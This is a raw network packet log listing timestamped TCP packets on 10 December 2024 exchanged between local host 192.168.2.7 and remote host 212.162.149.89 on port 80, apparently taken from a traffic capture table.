                                                                  Dec 10, 2024 16:28:59.232412100 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.232475042 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.266011953 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.266113997 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.266170979 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.266583920 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.335331917 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.335468054 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.335606098 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.336812019 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.337440014 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.337498903 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.337544918 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.337544918 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.340408087 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.340554953 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.340610981 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.343333960 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.343385935 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.343436956 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.346281052 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.346364021 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.346415997 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.346726894 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.349176884 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.349261999 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.349334002 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.351963997 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.352032900 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.352125883 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.352173090 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.354836941 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.354890108 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.354959965 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.357347965 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.357517004 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.357580900 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.359986067 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.360022068 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.360116959 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.362517118 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.362591028 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.362622976 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.362665892 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.365492105 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.365504980 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.365556002 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.365556002 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.367778063 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.368010998 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.368076086 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.374161005 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.374301910 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.374366045 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.375272036 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.375363111 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.375430107 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.377834082 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.377881050 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.378004074 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.378683090 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.380470991 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.380561113 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.380626917 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.382975101 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.383114100 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.383203983 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.386113882 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.386187077 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.386332989 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.388278008 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.388345003 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.388416052 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.390943050 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.391051054 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.391133070 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.392855883 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.392951965 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.392987013 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.394573927 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.394659996 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.394715071 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.394778013 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.394850016 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.396601915 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.396655083 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.396713018 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.396754980 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.398624897 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.398686886 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.399247885 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.399295092 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.400588989 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.400652885 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.400686026 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.400738001 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.402561903 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.402594090 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.402626038 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.402650118 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.404711962 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.404762030 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.405128002 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.405298948 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.406951904 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.407008886 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.407181978 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.407239914 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.408430099 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.408483028 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.408616066 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.408672094 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.410285950 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.410347939 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.410372019 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.410429001 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.527175903 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.527266979 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.527357101 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.527420998 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.527942896 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.528037071 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.528069973 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.528167009 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.529968977 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.530117989 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.530155897 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.530281067 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.531567097 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.531640053 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.531677008 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.531778097 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.533030987 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.533123016 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.533186913 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.533308029 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.534650087 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.534714937 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.534755945 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.534795046 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.536308050 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.536382914 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.536408901 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.536515951 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.537797928 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.537877083 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.537908077 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.537997007 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.539700985 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.539769888 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.539793015 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.539849043 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.541234970 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.541332960 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.541337967 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.541405916 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.542573929 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.542670965 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.542712927 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.542779922 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.544189930 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.544297934 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.544336081 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.544418097 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.545851946 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.545938969 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.545972109 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.546057940 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.547435999 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.547513008 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.547666073 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.547756910 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.549127102 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.549216032 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.549293995 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.549397945 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.550827026 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.550908089 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.550937891 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.550997019 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.552376032 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.552460909 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.552519083 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.552649975 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.554359913 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.554455042 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.554560900 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.554630995 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.556216955 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.556569099 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.556592941 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.557842016 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.558033943 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.558113098 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.558156013 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.558270931 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.559643030 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.559721947 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.559742928 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.559804916 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.561434984 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.561525106 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.561722040 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.561808109 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.563286066 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.563421965 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.563422918 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.563558102 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.565005064 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.565067053 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.565099001 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.565160036 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.566581964 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.566593885 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.566701889 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.567748070 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.567848921 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.647097111 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.647190094 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.647406101 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.647488117 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.647774935 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.647871017 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.649112940 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.649331093 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.649451017 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.650959969 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.651211977 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.651334047 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.653460979 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.653554916 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.653656006 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.654800892 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.654867887 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.654992104 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.656073093 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.656186104 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.656250000 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.657403946 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.657463074 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.657464027 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.657530069 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.658885956 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.659106970 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.659169912 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.660358906 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.660485029 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.660566092 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.662015915 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.662075043 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.662107944 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.662614107 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.663697958 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.663814068 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.663871050 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.665280104 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.665625095 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.665709972 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.666737080 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.666924953 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.667012930 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.668404102 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.668472052 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.668518066 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.668575048 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.670108080 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.670181036 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.670475960 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.670541048 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.671972036 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.672030926 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.672131062 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.672205925 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.673588037 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.673639059 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.673829079 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.673877954 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.675369024 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.675534010 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.675633907 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.677206039 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.677370071 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.677439928 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.678868055 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.678992987 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.679044008 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.680432081 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.680615902 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.680691957 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.682634115 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.682751894 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.682847977 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.684371948 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.684469938 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.684528112 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.686113119 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.686126947 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.686175108 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.687402964 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.687479019 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.687613010 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.687962055 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.689203978 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.689280033 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.689410925 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.690610886 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.722342968 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.722433090 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.722460032 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.722523928 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.723280907 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.723335028 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.723432064 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.723514080 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.724634886 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.724693060 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.724745035 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.724822998 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.726042032 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.726113081 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.726161003 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.727720976 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.727735043 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.727780104 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.728938103 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.728969097 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.728988886 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.729022026 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.730488062 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.730545044 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.730803013 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.730850935 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.731771946 CET8049784212.162.149.89192.168.2.7
